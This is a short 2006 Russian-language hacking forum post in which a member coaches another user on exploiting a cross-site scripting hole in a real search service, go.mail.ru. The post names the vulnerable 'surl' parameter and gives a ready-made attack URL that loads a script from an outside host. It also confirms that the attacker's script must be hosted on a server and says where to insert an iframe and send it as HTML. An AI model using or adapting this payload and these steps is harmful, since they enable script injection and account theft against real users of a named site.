06.06.2006, 21:33
|
|
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862
Репутация:
54
|
|
Сообщение от Sirko
Непонятно в каком параметре????
Например в данной xss уязвимый параметр surl
Код:
http://go.mail.ru/search?lfilter=y&q=%25CF%25F1%25E8%25F5%25EE%25EB%25EE%25E3%25E8%25 %20%20FF%2B%25F1%25EE%25E1%25E0%25EA%2B%253C%253C% 2Burl%%20%20253D%2522www%2Edogcatalog%2Enet%252F%2 A%2522&num=10&as_q=1&old_q=%25F1%25E0%25E9%25F2%25EE%25E2%2B%25F1%25EE% %20%2025E7%25E4%25E0%25ED%25E8%25E5&surl=%3Cscript src=http://site.ru/js.js%3E%3C/script%3E
Сообщение от Sirko
Это надо создать файл и положить на сервак где выполняются скрипты??
Да.
Сообщение от Sirko
И куда этот инфрейм вставлвть???
Толке не говорите в Ж....  В поле сообщения. Не забудь отослать в формате HTML.
|
|
|